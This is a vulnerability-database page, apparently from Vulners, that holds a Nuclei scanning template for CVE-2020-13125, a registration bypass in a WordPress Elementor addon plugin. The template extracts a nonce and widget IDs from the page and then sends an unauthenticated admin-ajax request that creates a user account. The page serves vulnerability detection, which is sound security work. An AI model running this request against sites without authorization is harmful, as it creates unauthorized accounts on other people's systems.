| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| CVE-2020-13125 | 27 Dec 202517:51 | – | circl | |
| CVE-2020-13126 | 19 Jun 202612:53 | – | circl | |
| WordPress Unauthorized Operation Vulnerability (CNVD-2020-29838) | 18 May 202000:00 | – | cnvd | |
| WordPress Elementor Pro Code Issue Vulnerability | 18 May 202000:00 | – | cnvd | |
| CVE-2020-13125 | 17 May 202000:39 | – | cve | |
| CVE-2020-13126 | 17 May 202000:38 | – | cve | |
| CVE-2020-13125 | 17 May 202000:39 | – | cvelist | |
| CVE-2020-13126 | 17 May 202000:38 | – | cvelist | |
| EUVD-2020-5401 | 7 Oct 202500:30 | – | euvd | |
| EUVD-2020-5402 | 7 Oct 202500:30 | – | euvd |
id: CVE-2020-13125
info:
name: Ultimate Addons for Elementor <= 1.24.1 - Registration Bypass
author: daffainfo
severity: high
description: |
An issue was discovered in the "Ultimate Addons for Elementor" plugin before 1.24.2 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13126. Unauthenticated attackers can create users with the Subscriber role even if registration is disabled.
impact: |
Unauthenticated attackers can create user accounts with Subscriber role, potentially leading to further malicious activities or privilege escalation
remediation: |
Update to version 1.24.2 or later.
reference:
- https://www.wordfence.com/blog/2020/05/combined-attack-on-elementor-pro-and-ultimate-addons-for-elementor-puts-1-million-sites-at-risk/
- https://nvd.nist.gov/vuln/detail/CVE-2020-13125
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2020-13125
epss-score: 0.02307
epss-percentile: 0.81281
cwe-id: NVD-CWE-noinfo
cpe: cpe:2.3:a:brainstormforce:ultimate_addons_for_elementor:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: brainstormforce
product: ultimate_addons_for_elementor
framework: wordpress
tags: cve2020,cve,wp,wordpress,wp-plugin,brainstormforce,ultimate-addons-for-elementor,vkev
flow: |
http(1)
for (let widget_id of iterate(template.widgets_id)) {
set("widget_id", widget_id)
http(2)
}
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
http:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "uaelRegistration", "form_nonce")'
condition: and
internal: true
extractors:
- type: regex
name: form_nonce
part: body
group: 1
regex:
- ',"form_nonce":"([a-f0-9]+)"'
internal: true
- type: regex
name: post_id
part: body
group: 1
regex:
- '"post":{"id":([0-9]+),'
internal: true
- type: regex
name: widgets_id
part: body
group: 1
regex:
- 'elementor-widget-uael-registration-form" data-id="([a-f0-9]+)"'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=uael_register_user&nonce={{form_nonce}}&data[page_id]={{post_id}}&data[widget_id]={{widget_id}}&data[user_name]={{username}}&data[email]={{email}}&data[password]={{password}}&data[first_name]={{firstname}}&data[last_name]={{lastname}}&data[send_email]={{randstr}}&data[auto_login]=yes
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'successfully registered'
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4b0a004830460221009667ab993bcd1dde4f963aae3179a2daceab278ca8ec21163e645c9bf4bcf413022100f6730f68ea55213b65e49c27c754a2790dd066fc7298c9c138a194485a1b8d6d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation